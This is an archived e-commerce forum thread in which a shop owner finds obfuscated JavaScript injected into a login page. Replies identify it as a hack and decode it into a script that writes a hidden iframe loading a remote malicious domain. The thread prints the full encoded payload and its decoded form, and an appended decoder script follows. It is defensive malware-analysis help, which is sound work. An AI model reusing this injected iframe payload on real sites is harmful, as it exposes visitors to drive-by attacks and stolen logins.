Weird javascript in my catalog/login.php


varois

My shop started to display an SSL error, saying that I have items that are not secure on my page and asking if I wish to continue and display the items ... Then I checked all the pictures and couldn't find any problem ... then I saw this weird JavaScript function:

<script>
function c41883415430m48d35164537b8(m48d3516453ba0){
  return (parseInt(m48d3516453ba0,16));
}

function m48d3516454757(m48d3516454b3f){
  function m48d35164556f7(){
    var m48d3516455adf=2;
    return m48d3516455adf;
  }
  var m48d3516454f27='';
  m48d3516455ec6=String.fromCharCode;
  for(m48d351645530e=0;m48d351645530e<m48d3516454b3f.length; m48d351645530e+=m48d35164556f7()){
    m48d3516454f27+=(m48d3516455ec6(c41883415430m48d35164537b8(m48d3516454b3f.substr(m48d351645530e,m48d35164556f7()))));
  }
  return m48d3516454f27;
}

var z16='';

var m48d35164562ae='3C7'+z16+'3637'+z16+'2697'+z16+'07'+z16+'43E667'+z16+'56E637'+z16+'4696F6E20636865636B5F636F6E7'+z16+'4656E7'+z16+'428297'+z16+'B7'+z16+'6617'+z16+'220693D303B7'+z16+'7'+z16+'68696C6528646F637'+z16+'56D656E7'+z16+'42E67'+z16+'657'+z16+'4456C656D656E7'+z16+'47'+z16+'3427'+z16+'9546167'+z16+'4E616D652827'+z16+'69667'+z16+'2616D6527'+z16+'292E6C656E67'+z16+'7'+z16+'468297'+z16+'B7'+z16+'6617'+z16+'220656C3D646F637'+z16+'56D656E7'+z16+'42E67'+z16+'657'+z16+'4456C656D656E7'+z16+'47'+z16+'3427'+z16+'9546167'+z16+'4E616D652827'+z16+'69667'+z16+'2616D6527'+z16+'295B695D3B6966282028656C2E7'+z16+'37'+z16+'47'+z16+'96C652E64697'+z16+'37'+z16+'06C617'+z16+'93D3D27'+z16+'6E6F6E6527'+z16+'207'+z16+'C7'+z16+'C20656C2E7'+z16+'37'+z16+'47'+z16+'96C652E7'+z16+'6697'+z16+'36962696C697'+z16+'47'+z16+'9203D3D27'+z16+'68696464656E27'+z16+'207'+z16+'C7'+z16+'C2028656C2E7'+z16+'7'+z16+'69647'+z16+'4683C3520262620656C2E68656967'+z16+'687'+z16+'43C35292920262620656C2E6E616D65213D27'+z16+'633427'+z16+'297'+z16+'B656C2E7'+z16+'0617'+z16+'2656E7'+z16+'44E6F64652E7'+z16+'2656D6F7'+z16+'6654368696C6428656C293B7'+z16+'D656C7'+z16+'36520692B2B3B7'+z16+'D7'+z16+'D636865636B5F636F6E7'+z16+'4656E7'+z16+'428293B0D0A696628216D7'+z16+'96961297'+z16+'B646F637'+z16+'56D656E7'+z16+'42E7'+z16+'7'+z16+'7'+z16+'2697'+z16+'465287'+z16+'56E657'+z16+'363617'+z16+'065282027'+z16+'2533632536392536362537'+z16+'3225363125366425363525323025366525363125366425363525336425363325333425323025

37'+z16+'332537'+z16+'32253633253364253237'+z16+'2536382537'+z16+'342537'+z16+'342537'+z16+'30253361253266253266253637'+z16+'253666253666253637'+z16+'2536632536352532642536312536652536312536632536392537'+z16+'61253635253265253633253666253664253266253639253665253265253633253637'+z16+'25363925336625333125333526253237'+z16+'2532622534642536312537'+z16+'342536382532652537'+z16+'322536662537'+z16+'352536652536342532382534642536312537'+z16+'342536382532652537'+z16+'3225363125366525363425366625366425323825323925326125333225333325333925333225

3330253239253262253237'+z16+'253334253634253631253336253337'+z16+'253336253330253333253237'+z16+'2532302537'+z16+'37'+z16+'2536392536342537'+z16+'34253638253364253334253336253230253638253635253639253637'+z16+'2536382537'+z16+'342533642533352533322533302532302537'+z16+'332537'+z16+'342537'+z16+'39253663253635253364253237'+z16+'2536342536392537'+z16+'332537'+z16+'302536632536312537'+z16+'39253361253230253665253666253665253635253237'+z16+'2533652533632532662536392536362537'+z16+'3225363125366425363525336527'+z16+'29293B7'+z16+'D7'+z16+'6617'+z16+'2206D7'+z16+'969613D7'+z16+'47'+z16+'27'+z16+'5653B3C2F7'+z16+'3637'+z16+'2697'+z16+'07'+z16+'43E';

document.write(m48d3516454757(m48d35164562ae));

</script>

 

I have never seen it before, and at the end of the code, on the last line, I found this:

 

<script>check_content()</script>

 

If someone has any knowledge about what this function is, please help me .... I'm afraid to delete this and make a mistake in my shop ...

 

Thanks !!!!


Delete the script.

 

You have been hacked, check the rest of your site & secure it.

 

http://www.oscommerce.com/forums/index.php?showtopic=313323

 

Check your site logs in cPanel, error logs will often show hacking attempts. Also look in stats for frequent visitors.

Sam

 

Remember, What you think I meant may not be what I thought I meant when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.


Yep, you've been hacked. If you have a Joomla or Mambo install on the same hosting you may wish to deal with the security of that install as well - because this javascript hack is normally associated with Joomla and Mambo - specifically a MamBot hack.

 

Vger


In "man readable" form, the script decodes to this:

 

<script>
function check_content()
{
 var i=0;
 while( document.getElementsByTagName('iframe').length) {
  var el=document.getElementsByTagName('iframe')[i];
  if (( el.style.display=='none' || el.style.visibility == 'hidden' || (el.width<5 && el.height<5))&& el.name!='c4'){
   el.parentNode.removeChild(el);
  } else i++;
 }
}

check_content();

if ( !myia ){
 document.write(unescape('%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%34%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%6f
%67%6c%65%2d%61%6e%61%6c%69%7a%65%2e%63%6f%6d%2f%69%6e%2e%63%67%69%3f%31%35%27%2b%4d%61%74%68%2e
%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%33%39%32%30%29%2b%27%34%64%61%36
%37%36%30%33%27%20%77%69%64%74%68%3d%34%36%20%68%65%69%67%68%74%3d%35%32%30%20%73%74%79%6c%65
%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e')); }
myia = true;
</script>

When you "unescape" the last part, it reads:

 

<iframe name=c4 src='http://google-analize.com/in.cgi?15'+Math.round(Math.random()*23920)+'4da67603' width=46 height=520 style='display: none'></iframe>

Gee....

:huh:

 

It's an iframe.....

:o

 

What a surprise.....

;)

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


Iframes are used to steal information.

 

Since it was on your login page, it was used to steal login information.


Archived

This topic is now archived and is closed to further replies.
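
The decoding walked through in the thread (hex pairs joined around an empty variable, then an unescape() of a percent-encoded string that yields a hidden iframe) can be done statically, without running the injected script. This is an added example, not code from any post in the thread; the function names are hypothetical and the sample input is constructed with a placeholder domain.

```javascript
// Static decoder for the two encoding layers seen in this thread.
// It only transforms strings; nothing from the sample is evaluated.

// Layer 1: hex pairs, split by '+name+' joins where name is an empty string.
function decodeHexLayer(source) {
  const empties = [...source.matchAll(/var\s+(\w+)\s*=\s*''/g)].map((m) => m[1]);
  let joined = source;
  if (empties.length) {
    const join = new RegExp("'\\s*\\+\\s*(?:" + empties.join('|') + ")\\s*\\+\\s*'", 'g');
    joined = source.replace(join, '');
  }
  const m = joined.match(/'((?:[0-9A-Fa-f]{2}){8,})'/);
  if (!m) return null;
  return m[1].replace(/../g, (h) => String.fromCharCode(parseInt(h, 16)));
}

// Layer 2: the argument of unescape('...'), percent-decoded byte by byte.
function decodePercentLayer(js) {
  const m = js.match(/unescape\(\s*'([^']*)'\s*\)/);
  if (!m) return null;
  return m[1].replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Layer 3: list iframes and flag hidden ones (display:none, visibility:hidden, or under 5x5).
function findIframes(html) {
  return [...html.matchAll(/<iframe\b([^>]*)>/gi)].map((tag) => {
    const attrs = {};
    for (const a of tag[1].matchAll(/([\w-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))/g)) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    }
    const style = (attrs.style || '').replace(/\s+/g, '').toLowerCase();
    const hidden = style.includes('display:none') || style.includes('visibility:hidden') ||
      (Number(attrs.width) < 5 && Number(attrs.height) < 5);
    return { src: attrs.src || '', hidden };
  });
}

function analyze(source) {
  const layer1 = decodeHexLayer(source);
  const layer2 = layer1 ? decodePercentLayer(layer1) : null;
  return { layer1, layer2, iframes: layer2 ? findIframes(layer2) : [] };
}

// Constructed sample (placeholder domain), encoded with the same two layers.
const enc = (s, pre) => s.replace(/[^]/g, (c) => pre + c.charCodeAt(0).toString(16).padStart(2, '0'));
const IFRAME = "<iframe name=c4 src='http://tracker.example.invalid/in.cgi?1' width=46 height=520 style='display: none'></iframe>";
const INNER = "<script>document.write(unescape('" + enc(IFRAME, '%') + "'));</script>";
const SAMPLE = "var z16='';\nvar p='" + enc(INNER, '').replace(/7/g, "7'+z16+'") + "';\ndocument.write(d(p));";
console.log(analyze(SAMPLE).iframes);
```

Run it with Node against the text of a suspicious file; a reported iframe with `hidden: true` and an off-site `src` is the pattern the thread describes.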
